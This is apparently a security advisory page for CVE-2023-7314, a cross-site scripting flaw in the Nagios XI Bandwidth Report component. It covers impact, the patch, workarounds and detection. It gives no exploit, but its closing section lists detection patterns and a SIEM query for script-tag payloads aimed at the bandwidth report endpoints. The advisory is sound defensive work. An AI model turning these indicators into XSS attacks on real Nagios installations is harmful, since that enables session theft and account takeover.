CVE-2023-7314
📋 TL;DR
Nagios XI versions before 5.11.3 contain a cross-site scripting vulnerability in the Bandwidth Report component. Insufficient input validation allows attackers to inject malicious scripts that execute in victims' browsers when viewing reports. This affects all Nagios XI administrators and users who access bandwidth reports.
💻 Affected Systems
- Nagios XI
📦 What is this software?
Nagios Xi by Nagios
⚠️ Risk & Real-World Impact
Worst Case
An attacker could steal administrator session cookies, perform actions as authenticated users, or redirect users to malicious sites, potentially leading to full system compromise if combined with other vulnerabilities.
Likely Case
Attackers steal session cookies or credentials from authenticated users, gaining unauthorized access to the Nagios XI interface with the victim's privileges.
If Mitigated
With proper input validation and output encoding, malicious scripts are neutralized before execution, preventing exploitation.
🎯 Exploit Status
Exploitation requires the attacker to trick an authenticated user into visiting a maliciously crafted bandwidth report URL or page.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: 5.11.3
Vendor Advisory: https://www.nagios.com/changelog/nagios-xi/
Restart Required: No
Instructions:
1. Backup current Nagios XI installation. 2. Download Nagios XI 5.11.3 or later from Nagios customer portal. 3. Follow the official upgrade guide at https://assets.nagios.com/downloads/nagiosxi/docs/Upgrading-Nagios-XI.pdf. 4. Verify upgrade completion.
🔧 Temporary Workarounds
Disable Bandwidth Report Component
allTemporarily disable the vulnerable Bandwidth Report component until patching is possible.
Navigate to Admin > System Extensions > Manage Components, find 'Bandwidth Report' and disable it
Implement Web Application Firewall (WAF)
allDeploy a WAF with XSS protection rules to block malicious payloads.
🧯 If You Can't Patch
- Restrict access to Nagios XI interface to trusted networks only using firewall rules.
- Implement Content Security Policy (CSP) headers to mitigate script injection impact.
🔍 How to Verify
Check if Vulnerable:
Check Nagios XI version in Admin > System Profile. If version is below 5.11.3, the system is vulnerable.Check Version:
grep 'nagiosxi_version' /usr/local/nagiosxi/var/xiversionVerify Fix Applied:
After upgrade, verify version is 5.11.3 or higher in Admin > System Profile and test Bandwidth Report functionality.📡 Detection & Monitoring
Log Indicators:
- Unusual GET/POST requests to bandwidth report URLs with script tags or JavaScript payloads in parameters
- Multiple failed authentication attempts followed by successful login from new IP
Network Indicators:
- HTTP requests containing <script> tags or JavaScript in URL parameters to Nagios XI bandwidth report endpoints
SIEM Query:
source="nagios_access.log" AND (uri_path="/nagiosxi/reports/bandwidth.php" OR uri_path="/nagiosxi/includes/components/bandwidth/") AND (query="*<script>*" OR query="*javascript:*")